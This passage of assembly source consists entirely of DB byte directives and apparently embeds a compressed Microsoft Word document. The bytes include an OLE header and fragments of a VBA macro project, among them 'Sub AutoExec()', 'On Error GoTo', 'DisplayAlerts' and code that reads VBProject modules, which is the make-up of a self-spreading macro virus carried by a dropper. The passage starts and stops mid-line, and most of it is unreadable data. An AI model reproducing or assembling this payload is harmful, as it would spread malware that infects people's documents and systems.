00CH,069H,00FH,00DH,006H,010H,018H,003H,008H,006H,080H,04DH,002H,0F8H,063H DB 022H,076H,06FH,07CH,0F4H,000H,073H,003H,016H,00FH,004H,00FH,010H,00FH,010H DB 022H,000H,001H,001H,001H,002H,016H,00CH,002H,004H,043H,0A4H,002H,007H,00FH DB 003H,010H,083H,000H,080H,092H,064H,024H,078H,0A0H,010H,0DAH,004H,008H,00BH DB 021H,056H,000H,042H,000H,041H,00BH,011H,0C7H,0C7H,00FH,00CH,00FH,010H,00EH DB 010H,008H,000H,001H,028H,080H,053H,034H,00EH,01FH,004H,00FH,007H,080H,0C0H DB 047H,0C9H,00FH,080H,022H,0FEH,0E8H,0FFH,068H,000H,069H,002H,0FCH,044H,012H DB 058H,02FH,080H,004H,03DH,00FH,005H,00EH,010H,023H,080H,053H,0A4H,023H,0D4H DB 013H,084H,00EH,01FH,00FH,00FH,0FDH,0FFH,008H,010H,096H,053H,0E5H,002H,00EH DB 013H,03CH,023H,040H,033H,0BCH,023H,044H,023H,0CCH,003H,01BH,003H,0CCH,003H DB 054H,003H,05CH,06FH,000H,067H,000H,013H,0C3H,0BFH,0EAH,06FH,000H,06BH,000H DB 013H,0E8H,067H,000H,053H,0A4H,06FH,000H,020H,002H,080H,021H,002H,004H,022H DB 002H,004H,023H,002H,004H,043H,018H,06BH,000H,05FH,055H,063H,014H,063H,004H DB 06FH,000H,06BH,000H,043H,094H,032H,002H,03CH,033H,002H,004H,034H,002H,004H DB 035H,002H,004H,036H,002H,004H,037H,055H,055H,002H,004H,038H,002H,004H,039H DB 002H,004H,03AH,002H,004H,03BH,002H,004H,03CH,002H,004H,03DH,002H,004H,03EH DB 002H,004H,03FH,0ADH,05AH,002H,004H,040H,002H,004H,013H,0FCH,042H,002H,008H DB 043H,002H,004H,044H,002H,004H,045H,002H,004H,043H,0B5H,047H,002H,008H,048H DB 0ABH,0AAH,002H,004H,003H,0B8H,04AH,002H,008H,04BH,002H,004H,04CH,002H,004H DB 04DH,002H,004H,04EH,002H,004H,04FH,002H,004H,050H,002H,004H,0EAH,0AAH,051H DB 002H,004H,052H,002H,004H,053H,002H,004H,003H,02CH,003H,004H,056H,002H,00CH DB 057H,002H,004H,058H,002H,004H,059H,002H,004H,0F6H,07FH,05AH,002H,004H,003H DB 018H,05CH,006H,008H,013H,0A8H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,001H,0E0H,0FCH,016H,001H,000H DB 001H,0B6H,022H,0C3H,034H,046H,002H,008H,0FFH,0FFH,002H,0A6H,004H,008H,005H DB 00AH,003H,00EH,00FH,004H,00FH,010H,0BFH,055H,00BH,010H,023H,015H,023H,04DH DB 023H,049H,023H,045H,008H,069H,001H,023H,04FH,003H,00EH,078H,002H,02FH,0DEH DB 002H,004H,0F7H,022H,078H,0F5H,00FH,0D8H,022H,080H,003H,014H,002H,00FH,032H DB 049H,000H,000H,08DH,09AH,08FH,09AH,000H,002H,07EH,023H,00FH,088H,002H,015H DB 003H,034H,0AFH,01DH,002H,007H,00FH,003H,009H,010H,003H,0A5H,013H,002H,070H DB 0D6H,002H,013H,003H,004H,0EBH,023H,0C5H,002H,041H,003H,018H,000H,000H,0DFH DB 0F3H,07FH,002H,00AH,002H,019H,000H,00CH,002H,008H,003H,067H,00FH,004H,00FH DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,009H,010H,023H,0CCH DB 002H,028H,085H,000H,053H,04CH,003H,012H,000H,002H,0EBH,053H,010H,008H,00AH DB 094H,005H,00AH,000H,000H,002H,03CH,005H,00AH,004H,054H,0FFH,0FFH,015H,08DH DB 001H,000H,04EH,000H,030H,000H,07BH,002H,004H,030H,002H,004H,032H,002H,004H DB 039H,0B1H,01EH,002H,004H,036H,000H,02DH,002H,006H,003H,012H,030H,00CH,00AH DB 043H,006H,016H,009H,01EH,005H,024H,005H,006H,034H,000H,036H,000H,08CH,000H DB 07DH,000H,019H,0A2H,0DDH,036H,002H,000H,0DFH,033H,0E1H,013H,086H,001H,001H DB 080H,012H,01EH,0CCH,03FH,002H,081H,023H,09DH,003H,07BH,0FFH,0FFH,003H,0A7H DB 013H,080H,002H,017H,004H,003H,005H,016H,015H,04DH,093H,0BBH,033H,0A3H,00CH DB 011H,07CH,0FAH,01AH,002H,00BH,018H,00FH,00CH,003H,039H,007H,014H,003H,008H DB 00DH,000H,0A3H,035H,094H,003H,017H,004H,004H,093H,0B7H,003H,018H,003H,004H DB 0DFH,0FFH,003H,011H,022H,081H,002H,007H,022H,009H,002H,006H,000H,002H,0C5H DB 003H,080H,003H,01CH,005H,076H,003H,00AH,00FH,032H,003H,014H,00BH,004H,004H DB 039H,002H,005H,00FH,0FDH,007H,014H,002H,00BH,01FH,0F1H,007H,01BH,0FFH,002H DB 000H,070H,002H,01FH,04DH,032H,0E8H,005H,013H,002H,00DH,002H,02CH,005H,006H DB 015H,077H,01FH,0E1H,003H,00CH,00FH,004H,00FH,010H,00FH,010H,007H,010H,0FEH DB 0CAH,001H,002H,0EEH,022H,081H,008H,000H,013H,064H,004H,016H,002H,00CH,0DFH DB 0FFH,023H,094H,024H,0CAH,002H,00CH,053H,04DH,033H,024H,000H,002H,00CH,063H DB 0B5H,053H,005H,003H,00CH,0B3H,015H,003H,0E8H,003H,00CH,043H,0A9H,043H,05DH DB 003H,00CH,0DDH,0A2H,003H,030H,090H,003H,049H,002H,030H,0B3H,019H,0A0H,006H DB 00CH,003H,018H,0C8H,003H,00CH,080H,008H,000H,003H,060H,0D8H,002H,00CH,026H DB 03EH,004H,002H,024H,032H,055H,000H,0E0H,002H,00CH,000H,080H,009H,003H,006H DB 002H,0DCH,012H,048H,00AH,00CH,003H,0F6H,001H,001H,012H,004H,0F0H,002H,01CH DB 08FH,004H,004H,070H,000H,0C1H,000H,01CH,002H,013H,014H,0AFH,000H,020H,000H DB 01EH,060H,028H,002H,028H,000H,020H,002H,002H,01DH,002H,003H,020H,000H,024H DB 002H,005H,012H,022H,004H,012H,0F7H,000H,080H,080H,020H,000H,026H,002H,0F6H DB 000H,0A4H,022H,0BFH,020H,000H,028H,002H,021H,000H,02AH,002H,004H,082H,009H DB 02CH,002H,004H,02EH,002H,08BH,000H,000H,004H,018H,005H,01CH,026H,002H,007H DB 020H,025H,000H,02CH,002H,000H,000H,001H,000H,021H,000H,030H,002H,025H,000H DB 032H,002H,002H,000H,0AEH,000H,008H,000H,000H,0A8H,027H,043H,06FH,063H,061H DB 069H,06EH,065H,005H,000H,094H,0A2H,020H,093H,002H,07EH,067H,032H,0A1H,08CH DB 040H,053H,000H,007H,060H,0A3H,03BH,00CH,000H,058H,002H,02CH,00EH,000H,063H DB 03AH,05CH,063H,005H,02EH,02EH,030H,020H,073H,079H,073H,01DH,002H,082H,009H DB 078H,042H,040H,034H,002H,001H,000H,040H,004H,014H,042H,040H,06BH,00FH,022H DB 0D8H,092H,0BBH,063H,092H,033H,09BH,002H,052H,013H,056H,06CH,002H,0FCH,063H DB 083H,003H,0F2H,013H,072H,001H,0A7H,0B1H,000H,000H,000H,041H,074H,074H,072H DB 069H,062H,075H,074H,000H,065H,020H,056H,042H,05FH,04EH,061H,081H,000H,092H DB 0EFH,020H,03DH,020H,022H,054H,068H,072H,084H,044H,06FH,063H,075H,06DH,065H DB 06EH,010H,000H,000H,074H,022H,00DH,00AH,00AH,08CH,042H,061H,073H,001H,002H DB 08CH,030H,07BH,030H,030H,000H,000H,030H,032H,030H,050H,039H,030H,036H,02DH DB 000H,010H,030H,003H,008H,043H,007H,000H,000H,000H,014H,002H,012H,001H,024H DB 030H,030H,034H,036H,07DH,001H,00DH,07CH,043H,072H,065H,000H,000H,061H,074H DB 061H,062H,082H,06CH,001H,086H,046H,061H,06CH,073H,065H,00CH,05EH,000H,000H DB 000H,050H,072H,065H,064H,065H,063H,06CH,061H,089H,000H,006H,049H,064H,000H DB 08BH,054H,000H,000H,072H,075H,00DH,022H,040H,045H,078H,070H,06FH,073H,065H DB 014H,01CH,054H,000H,065H,000H,000H,06DH,070H,06CH,061H,074H,065H,044H,030H DB 065H,072H,069H,076H,002H,024H,011H,065H,000H,000H,043H,075H,0C0H,073H,074H DB 06FH,06DH,069H,07AH,004H,088H,003H,032H,000H,053H,075H,000H,000H,062H,020H DB 041H,075H,074H,06FH,000H,045H,078H,065H,063H,028H,029H,00DH,00AH,000H,000H DB 000H,04FH,06EH,020H,045H,072H,072H,06FH,072H,080H,020H,047H,06FH,054H,06FH DB 020H,065H,000H,000H,000H,005H,001H,080H,055H,070H,070H,06CH,069H,063H,061H DB 074H,080H,069H,06FH,06EH,000H,000H,02EH,044H,069H,073H,000H,035H,080H,079H DB 041H,06CH,065H,072H,074H,073H,000H,055H,000H,000H,013H,005H,034H,008H,011H DB 045H,06EH,081H,030H,043H,061H,06EH,040H,063H,065H,06CH,000H,000H,04BH,065H DB 079H,000H,012H,077H,086H,064H,000H,01BH,001H,00AH,064H,00DH,00AH,046H,000H DB 000H,080H,02DH,012H,069H,080H,009H,031H,020H,080H,02FH,04EH,06FH,072H,008H DB 06DH,061H,000H,000H,06CH,005H,05FH,02EH,056H,042H,050H,040H,072H,06FH,06AH DB 065H,063H,074H,080H,004H,000H,000H,043H,020H,06FH,06DH,070H,06FH,06EH,080H DB 0C5H,073H,02EH,000H,043H,06FH,075H,06EH,000H,000H,074H,00DH,00AH,049H,044H DB 066H,020H,0A2H,017H,028H,069H,029H,000H,019H,064H,000H,000H,004H,065H,04DH DB 06FH,064H,075H,06CH,065H,02EH,000H,04CH,012H,0C5H,073H,028H,031H,02CH,008H DB 040H,000H,020H,031H,029H,000H,03BH,022H,012H,0D8H,004H,063H,061H,080H,004H DB 022H,020H,054H,068H,000H,000H,065H,002H,06EH,089H,039H,04EH,065H,078H,074H DB 020H,069H,014H,00DH,00AH,023H,025H,000H,042H,049H,080H,027H,072H,074H,020H DB 040H,028H,022H,013H,0D1H,083H,014H,02EH,030H,012H,0CEH,022H,000H,000H,0C0H DB 050H,00CH,010H,053H,061H,006H,076H,040H,073H,081H,052H,03AH,00DH,00AH,045H DB 000H,000H,06EH,024H,064H,020H,0C0H,05CH,00DH,00AH,041H,000H,0D0H,0CFH,011H DB 0E0H,0A1H,0B1H,008H,008H,01AH,0E1H,000H,00EH,001H,03EH,000H,003H,000H,0FEH DB 0FFH,009H,039H,05DH,000H,0CCH,061H,05EH,081H,00CH,053H,04FH,0FFH,016H,004H DB 000H,000H,009H,002H,004H,0E4H,004H,047H,049H,003H,017H,005H,000H,002H,000H DB 000H,0AEH,02CH,001H,02AH,000H,05CH,000H,047H,000H,07BH,042H,05BH,053H,00CH DB 053H,048H,034H,0C2H,0EEH,046H,05CH,03EH,0F3H,020H,003H,01AH,003H,004H,02DH DB 000H,05FH,048H,003H,016H,009H,004H,055H,048H,023H,000H,033H,000H,02EH,002H DB 050H,023H,000H,028H,000H,039H,000H,023H,002H,032H,03AH,002H,062H,041H,000H DB 052H,000H,051H,000H,055H,000H,049H,000H,0A8H,00AH,056H,000H,04FH,0B2H,046H DB 020H,0B2H,05AH,045H,022H,09DH,050H,002H,018H,04FH,002H,080H,052H,000H,041H DB 000H,05AH,055H,04DH,002H,004H,053H,00FH,02CH,004H,02CH,043H,002H,034H,04DH DB 002H,03EH,04EH,002H,00EH,05CH,002H,028H,049H,002H,056H,052H,055H,0B5H,002H DB 014H,053H,002H,004H,046H,0A2H,026H,020H,002H,018H,048H,002H,03EH,052H,002H DB 0BAH,044H,002H,042H,0A5H,0B8H,05CH,002H,06CH,02AH,0BAH,042H,002H,016H,033H DB 002H,090H,032H,002H,092H,044H,000H,04CH,002H,002H,023H,002H,016H,022H,0D0H DB 0C2H,058H,061H,0D2H,058H,0A2H,08AH,020H,0A2H,0E2H,061H,000H,073H,0A2H,066H DB 063H,002H,08EH,046H,0A2H,068H,072H,002H,008H,041H,000H,070H,002H,002H,098H DB 0FAH,06CH,000H,05FH,002H,02CH,003H,042H,05FH,000H,005H,0A8H,04AH,002H,060H DB 043H,002H,070H,01EH,079H,00FH,00FH,008H,010H,0A2H,080H,0BFH,0EAH,032H,067H DB 033H,063H,005H,004H,008H,019H,00FH,009H,00AH,010H,01BH,002H,00CH,07AH,0B6H DB 0ADH,064H,002H,098H,072H,002H,010H,00FH,003H,00FH,010H,0FBH,0E5H,00FH,010H DB 007H,010H,008H,012H,0E2H,005H,07AH,005H,006H,007H,018H,00FH,008H,00BH,010H DB 049H,002H,00DH,084H,002H,002H,005H,002H,003H,00DH,0F6H,078H,0EFH,077H,000H DB 06DH,002H,014H,00FH,003H,00FH,010H,00BH,010H,014H,00FH,080H,00BH,01DH,00FH DB 00CH,006H,010H,054H,002H,008H,0A3H,0D8H,002H,007H,05FH,07FH,01FH,076H,003H DB 013H,00FH,004H,00FH,010H,00CH,010H,010H,0D2H,080H,006H,002H,012H,063H,00FH DB 013H,002H,002H,00BH,00FH,003H,00FH,010H,022H,066H,000H,044H,0D5H,000H,052H DB 036H,027H,069H,000H,063H,0D2H,082H,074H,012H,086H,06FH,0D2H,0EAH,073H,00CH DB 02CH,020H,03FH,03AH,022H,0F2H,0FDH,005H,083H,082H,035H,03FH,03AH,002H,018H DB 083H,08CH,03FH,03AH,039H,036H,003H,00AH,037H,03AH,038H,022H,0A8H,030H,000H DB 023H,000H,034H,023H,0A2H,002H,036H,03BH,03EH,072H,000H,071H,022H,0B2H,069H DB 000H,076H,022H,0A2H,073H,000H,020H,0F2H,094H,065H,002H,006H,0EAH,045H,050H DB 0E4H,01CH,067H,002H,006H,061H,012H,09CH,023H,0C8H,033H,01EH,003H,0B6H,072H DB 004H,028H,06FH,000H,066H,052H,0F3H,020H,0ADH,01AH,032H,026H,066H,002H,00AH DB 003H,018H,065H,032H,01EH,04FH,002H,00CH,066H,002H,0D4H,063H,062H,013H,003H DB 030H,053H,000H,057H,0ADH,056H,002H,022H,052H,032H,092H,003H,07EH,04FH,032H DB 024H,042H,002H,082H,04DH,004H,022H,00DH,048H,057H,002H,056H,072H,002H,07CH DB 020H,00AH,056H,000H,003H,02AH,030H,002H,082H,04FH,000H,062H,000H,06AH,002H DB 048H,063H,05BH,020H,002H,03AH,069H,002H,010H,072H,0A7H,0FEH,012H,034H,0F3H DB 0AEH,01BH,02FH,0B8H,000H,04FH,068H,030H,002H,0E4H,033H,002H,0E6H,099H,092H DB 00BH,00AH,01FH,02EH,013H,024H,009H,004H,017H,02EH,0A7H,01AH,033H,0D6H,013H DB 02EH,003H,004H,043H,000H,043H,068H,057H,042H,062H,04EH,002H,0CAH,04FH,002H DB 0D4H,043H,04CH,053H,000H,059H,055H,0EDH,042H,01CH,054H,032H,0B8H,04DH,002H DB 0FAH,053H,032H,0BCH,044H,002H,0ECH,04CH,002H,010H,003H,03CH,054H,002H,0B2H DB 003H,0ECH,003H,0F4H,0D5H,005H,043H,08EH,041H,012H,064H,074H,002H,0E4H,06DH DB 002H,0C2H,017H,0F6H,00BH,0C6H,0E0H,008H,0C6H,041H,000H,046H,000H,035H,054H DB 0D5H,000H,031H,002H,0C4H,031H,0A2H,03CH,032H,012H,0F4H,042H,012H,014H,035H DB 042H,06AH,02DH,002H,016H,031H,002H,082H,005H,014H,0AAH,0EDH,043H,052H,004H DB 044H,002H,01EH,034H,002H,02AH,034H,002H,032H,003H,022H,035H,002H,00CH,007H DB 0CCH,07DH,012H,06AH,003H,08AH,003H,0C2H,06BH,0A3H,003H,004H,00FH,0C6H,057H DB 002H,0BEH,05CH,002H,004H,00BH,0C6H,04DH,002H,010H,045H,0AAH,06DH,000H,073H DB 022H,030H,054H,002H,0ECH,036H,037H,044H,002H,048H,01FH,0B2H,074H,012H,0A0H DB 009H,028H,020H,000H,005H,068H,023H,00EH,01FH,0B4H,062H,024H,042H,01DH,0B4H DB 001H,000H,0AAH,056H,0E4H,008H,0EEH,033H,052H,070H,032H,002H,0D4H,044H,002H DB 0F6H,038H,002H,048H,063H,008H,046H,012H,044H,037H,002H,0DAH,031H,055H,0EBH DB 002H,0F0H,044H,004H,014H,042H,002H,026H,041H,002H,0DCH,02DH,002H,004H,003H DB 0F0H,035H,002H,0F0H,033H,002H,004H,023H,0CCH,005H,0F0H,06FH,0DBH,00FH,0EEH DB 00FH,0EEH,005H,0EEH,015H,0AEH,050H,012H,0B0H,053H,0C8H,045H,002H,008H,00FH DB 0F2H,045H,092H,001H,00FH,0F2H,06FH,022H,0D6H,00FH,0F2H,007H,000H,00FH,0F2H DB 02FH,0A6H,00FH,0F2H,000H,000H,0E1H,02EH,045H,00DH,08FH,0E0H,01AH,010H,085H DB 02EH,002H,000H,056H,060H,08CH,04DH,00BH,0B4H,000H,000H,01CH,001H,027H,0BAH DB 013H,002H,046H,012H,0E6H,044H,022H,0B6H,034H,055H,0D5H,002H,0ECH,02DH,002H DB 0DCH,042H,012H,012H,041H,014H,006H,030H,012H,008H,042H,002H,00AH,042H,012H DB 028H,045H,002H,01AH,025H,0CEH,0AEH,05FH,041H,062H,080H,003H,0FCH,013H,010H DB 044H,012H,032H,035H,012H,02AH,01FH,006H,015H,006H,07FH,022H,07FH,022H,07BH DB 022H,04DH,022H,0E6H,043H,0EBH,055H,074H,03AH,079H,002H,04FH,002H,08AH,046H DB 004H,018H,013H,032H,00DH,00EH,013H,040H,04FH,022H,08AH,037H,022H,02EH,044H DB 022H,0F4H,04CH,06FH,017H,02FH,02EH,016H,03CH,04BH,01AH,03FH,0E4H,065H,052H DB 00CH,013H,060H,04CH,042H,018H,02FH,030H,035H,024H,001H,052H,0EEH,003H,000H DB 004H,050H,0FFH,002H,000H,000H,006H,0A2H,07BH,008H,002H,008H,016H,0D6H,00BH DB 003H,020H,0B2H,069H,0D6H,062H,053H,08AH,00FH,004H,00FH,010H,00FH,010H,03DH DB 0A8H,005H,010H,000H,074H,04EH,056H,09DH,003H,055H,008H,004H,08DH,09AH,001H DB 000H,018H,032H,0DEH,068H,002H,09EH,073H,012H,082H,02AH,000H,06FH,002H,0AEH DB 075H,052H,014H,065H,052H,0B8H,074H,000H,00AH,000H,032H,033H,036H,064H,064H DB 061H,008H,06FH,032H,031H,039H,092H,024H,02AH,044H,001H,011H,002H,099H,0F3H DB 04CH,004H,040H,002H,0A9H,000H,0F3H,01AH,005H,064H,001H,0FEH,0FFH,001H,0B3H DB 0E3H,005H,00CH,00FH,006H,00FH,010H,00FH,010H,002H,0E4H,002H,04DH,00FH,016H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,0FFH DB 0FFH,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,00FH,010H,01FH,000H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,003H,010H DB 0A3H,098H,0C6H,077H,092H,0D1H,0D2H,011H,0BCH,0A4H,044H,0BCH,006H,045H,053H DB 082H,093H,003H,014H,023H,078H,003H,008H,060H,022H,036H,080H,002H,004H,043H DB 01CH,01DH,000H,0FFH,000H,020H,000H,000H,028H,000H,000H,004H,004H,057H,06FH DB 072H,064H,0B5H,06BH,010H,000H,003H,004H,056H,000H,080H,042H,041H,0F7H,0E2H DB 010H,000H,005H,004H,057H,069H,06EH,031H,036H,0C1H,07EH,006H,00BH,010H,000H DB 033H,032H,007H,07FH,003H,01FH,04DH,061H,063H,0B3H,0B2H,010H,000H,008H,004H DB 050H,072H,001H,000H,0C2H,054H,074H,06FH,031H,03AH,071H,010H,000H,006H,004H DB 073H,074H,064H,06FH,06CH,065H,000H,000H,093H,060H,010H,000H,007H,000H,04DH DB 053H,046H,06FH,072H,06DH,073H,043H,00FH,010H,028H,010H,000H,00CH,004H,0D2H DB 07FH,073H,0D6H,07EH,074H,03CH,09EH,010H,000H,009H,002H,07CH,0FFH,003H,004H DB 080H,004H,000H,05FH,045H,076H,061H,06CH,075H,0D2H,02DH,018H,0D9H,003H,040H DB 04FH,066H,066H,069H,063H,000H,043H,065H,015H,075H,010H,000H,00FH,004H,054H DB 0D6H,047H,004H,062H,063H,074H,081H,045H,002H,055H,004H,084H,045H,04DH,0F3H DB 0C2H,099H,06FH,031H,0D4H,012H,003H,07CH,0D3H,045H,045H,0D2H,044H,0ECH,09CH DB 010H,002H,0BCH,065H,001H,0E3H,0D2H,042H,051H,05BH,010H,000H,00BH,000H,041H DB 0D6H,03BH,0D2H,03AH,0A5H,02AH,010H,0F2H,0AEH,0D2H,03FH,0D2H,092H,009H,018H DB 0D6H,03FH,0F4H,0F6H,002H,05EH,000H,045H,06EH,061H,062H,06CH,065H,0D2H,040H DB 0D5H,03FH,0EAH,0F3H,010H,019H,000H,032H,061H,077H,064H,002H,02AH,003H,018H DB 064H,0FCH,0D3H,010H,000H,001H,000H,069H,060H,010H,010H,038H,00DH,000H,00EH DB 000H,0D2H,045H,0D2H,044H,007H,090H,071H,0ACH,002H,0BFH,000H,0D2H,04FH,003H DB 0FAH,063H,074H,04FH,068H,00BH,094H,002H,0E0H,002H,00FH,043H,0D4H,053H,065H DB 06EH,074H,073H,00AH,027H,012H,02DH,000H,0D4H,058H,030H,076H,003H,057H,0C8H DB 024H,043H,06FH,064H,0D6H,052H,0E1H,01CH,003H,01BH,0D4H,056H,0BAH,0CEH,002H DB 0F1H,000H,049H,0D2H,088H,072H,074H,004H,06CH,069H,0C5H,002H,0C1H,000H,053H DB 061H,076H,065H,092H,0D0H,003H,0D9H,017H,02AH,06AH,002H,086H,032H,0E5H,001H DB 0F6H,0BBH,001H,012H,0BDH,0E2H,095H,004H,042H,03AH,047H,08EH,013H,0C4H,005H DB 004H,0A2H,01FH,002H,018H,002H,03FH,0B4H,005H,01DH,006H,006H,00CH,002H,01FH DB 0A0H,0B6H,0FFH,0FFH,00EH,002H,003H,002H,02AH,011H,002H,02AH,00CH,002H,008H DB 003H,01BH,00CH,002H,0DEH,0D3H,046H,012H,024H,00AH,003H,003H,00FH,005H,0D5H DB 0A4H,001H,080H,0B2H,080H,001H,000H,0D2H,079H,012H,011H,030H,02AH,002H,002H DB 090H,009H,000H,000H,000H,070H,014H,006H,048H,003H,000H,082H,002H,000H,064H DB 0E4H,004H,004H,000H,00FH,038H,000H,000H,01CH,000H,017H,01DH,0F2H,01BH,022H DB 010H,063H,074H,005H,051H,000H,048H,000H,000H,040H,002H,000H,000H,00AH,006H DB 002H,00AH,03DH,0ADH,002H,00AH,007H,002H,07CH,001H,014H,008H,006H,012H,080H DB 000H,009H,002H,012H,080H,019H,0A2H,0DDH,0F2H,0CBH,00CH,002H,04AH,012H,03CH DB 002H,00AH,016H,028H,02CH,000H,001H,039H,022H,036H,010H,022H,037H,03EH,002H DB 019H,073H,092H,0EAH,092H,09BH,06FH,0C2H,0D5H,065H,050H,084H,082H,000H,00DH DB 052H,0D2H,025H,05CH,000H,003H,062H,0BCH,047H,0F5H,0A6H,0B0H,034H,033H,030H DB 02DH,022H,076H,000H,002H,004H,043H,000H,00AH,003H,002H,00EH,001H,012H,0F4H DB 0A5H,023H,000H,032H,02EH,030H,023H,000H,010H,030H,023H,043H,03AH,000H,05CH DB 057H,049H,04EH,044H,04FH,057H,092H,036H,053H,059H,053H,008H,000H,054H,045H DB 04DH,082H,077H,054H,044H,04FH,04CH,045H,032H,02EH,010H,054H,04CH,042H,023H DB 094H,000H,000H,008H,0F2H,07AH,000H,0F2H,08BH,061H,074H,022H,01DH,023H,000H DB 02FH,000H,001H,016H,000H,007H,040H,020H,080H,002H,04DH,053H,000H,046H,023H DB 0ADH,03EH,000H,00EH,021H,001H,006H,084H,09BH,045H,072H,004H,000H,000H,080H DB 083H,09BH,02FH,000H,07AH,080H,009H,006H,070H,080H,001H,001H,046H,041H,046H DB 000H,000H,035H,031H,034H,000H,031H,036H,032H,02DH,042H,038H,035H,033H,010H DB 02DH,031H,031H,00AH,000H,044H,0F2H,04CH,039H,092H,01BH,034H,034H,034H,035H DB 035H,033H,035H,00EH,034H,001H,048H,017H,000H,000H,046H,004H,033H,02EH,054H DB 057H,044H,000H,023H,04DH,069H,063H,072H,06FH,073H,06FH,000H,000H,028H,066H DB 074H,020H,002H,03DH,020H,000H,060H,020H,04FH,002H,062H,001H,0B0H,020H,000H DB 001H,04CH,069H,062H,072H,061H,01CH,072H,079H,062H,0CBH,001H,01EH,050H,030H DB 000H,090H,00DH,008H,000H,000H,013H,072H,002H,05FH,050H,033H,043H,032H,044H DB 000H,044H,046H,038H,032H,02DH,043H,000H,000H,046H,045H,032H,037H,005H,050H DB 041H,034H,01DH,050H,080H,04AH,050H,05CH,090H,056H,000H,00AH,042H,045H,05CH DB 085H,028H,045H,058H,0A7H,028H,078H,0DCH,000H,077H,0DDH,083H,081H,095H,043H DB 004H,002H,078H,04FH,033H,038H,044H,078H,082H,04FH,040H,075H,0B4H,015H,042H DB 078H,02AH,098H,0C0H,02BH,080H,040H,08EH,0C4H,02CH,032H,000H,02CH,044H,0A2H DB 0A5H,043H,02DH,035H,042H,046H,041H,092H,0D6H,030H,000H,000H,031H,042H,02DH DB 042H,044H,045H,052H,035H,040H,078H,041H,041H,040H,077H,034H,0C0H,000H,000H DB 002H,032H,001H,008H,055H,041H,052H,051H,055H,049H,056H,04FH,000H,053H,020H DB 044H,000H,020H,045H,020H,050H,052H,04FH,000H,047H,052H,041H,04DH,041H,053H DB 05CH,072H,0A3H,043H,052H,000H,000H,04FH,053H,04FH,046H,054H,000H,020H,04FH DB 046H,046H,049H,043H,045H,05CH,001H,084H,000H,000H,001H,04DH,053H,04FH,039H DB 037H,02EH,044H,00CH,04CH,04CH,048H,05CH,083H,025H,020H,000H,000H,038H,02EH DB 030H,045H,092H,05CH,00FH,082H,0BFH,001H,000H,013H,0C2H,001H,08DH,004H,010H DB 004H,09AH,019H,042H,0A8H,034H,0EFH,000H,06FH,063H,075H,06DH,032H,011H,01AH DB 011H,04EH,004H,032H,000H,004H,000H,018H,040H,033H,054H,000H,068H,011H,040H DB 038H,062H,0DAH,080H,08FH,063H,000H,075H,008H,002H,051H,000H,090H,062H,0D9H DB 040H,0B6H,01CH,0C0H,006H,062H,0F4H,048H,042H,001H,031H,0C2H,0C4H,000H,000H DB 0EBH,000H,0DCH,01EH,08BH,042H,002H,001H,005H,02CH,042H,01AH,08FH,09AH,022H DB 042H,000H,009H,008H,00AH,02BH,042H,001H,010H,042H,001H,025H,08AH,01AH,0E1H DB 02FH,0A2H,03EH,000H,003H,000H,0B0H,0C6H,0FEH,0FFH,009H,000H,0D3H,020H,007H DB 01CH,001H,002H,009H,021H,002H,004H,004H,003H,010H,000H,000H,004H,08CH,006H DB 08BH,07FH,000H,002H,069H,07FH,05DH,002H,084H,023H,075H,002H,02EH,00FH,049H DB 006H,049H,049H,044H,03DH,022H,07BH,037H,037H,043H,036H,000H,086H,039H,038H DB 041H,046H,02DH,044H,031H,039H,032H,013H,0F9H,022H,004H,043H,041H,034H,02DH DB 016H,0F9H,084H,062H,034H,030H,002H,001H,07DH,022H,00DH,00AH,037H,0BAH,03DH DB 00BH,076H,02FH,026H,048H,002H,01FH,004H,003H,00DH,080H,003H,00AH,04EH,061H DB 06DH,065H,03DH,022H,037H,030H,046H,0DDH,002H,03AH,048H,065H,06CH,070H,043H DB 06FH,0A0H,000H,06EH,074H,065H,078H,074H,003H,072H,030H,002H,013H,043H,04DH DB 047H,03DH,022H,042H,038H,042H,080H,001H,041H,032H,037H,035H,044H,032H,042H DB 00BH,004H,002H,01EH,044H,050H,042H,03DH,022H,037H,030H,000H,003H,037H,032H DB 045H,046H,031H,030H,046H,030H,005H,004H,002H,018H,047H,043H,03DH,022H,032H DB 038H,000H,009H,032H,041H,042H,037H,043H,038H,042H,038H,003H,004H,033H,037H DB 002H,017H,00DH,00AH,05BH,048H,000H,000H,06FH,073H,074H,020H,045H,078H,074H DB 065H,06EH,064H,065H,072H,020H,049H,06EH,066H,010H,000H,06FH,05DH,00DH,00AH DB 008H,09CH,031H,03DH,07BH,033H,038H,033H,032H,044H,036H,034H,030H,009H,000H DB 022H,081H,039H,030H,002H,0E6H,043H,046H,02DH,038H,045H,034H,033H,02DH,030H DB 030H,041H,030H,000H,014H,043H,039H,031H,031H,030H,030H,035H,041H,07DH,03BH DB 022H,08EH,03BH,008H,036H,030H,00DH,00AH,003H,083H,002H,05AH,062H,038H,06BH DB 073H,070H,061H,063H,065H,002H,051H,00BH,0FAH,03DH,032H,037H,02CH,020H,003H DB 004H,000H,0E0H,036H,032H,033H,02CH,020H,033H,037H,035H,02CH,020H,05AH,00DH DB 00AH,01FH,0CEH,012H,07CH,004H,003H,0A3H,091H,01FH,0CEH,003H,015H,001H,000H DB 001H,012H,0E2H,003H,0E2H,0FDH,043H,0B0H,006H,009H,002H,003H,015H,000H,0C0H DB 004H,006H,018H,044H,000H,046H,01DH,002H,008H,017H,073H,06FH,020H,064H,06FH DB 020H,036H,074H,066H,074H,020H,002H,093H,064H,0BCH,02AH,020H,000H,002H,038H DB 062H,089H,003H,00CH,002H,027H,000H,022H,00EH,000H,003H,00CH,02EH,002H,00DH DB 075H,023H,09BH,02EH,038H,0E0H,0FFH,000H,0F4H,039H,0B2H,071H,002H,046H,008H DB 003H,00FH,09DH,056H,02AH,003H,07EH,00FH,004H,00FH,010H,00FH,010H,00FH,010H DB 00FH,010H,00FH,010H,0BFH,082H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH DB 010H,005H,010H,001H,0B2H,0E6H,06FH,0A2H,046H,070H,000H,04FH,000H,062H,0E2H DB 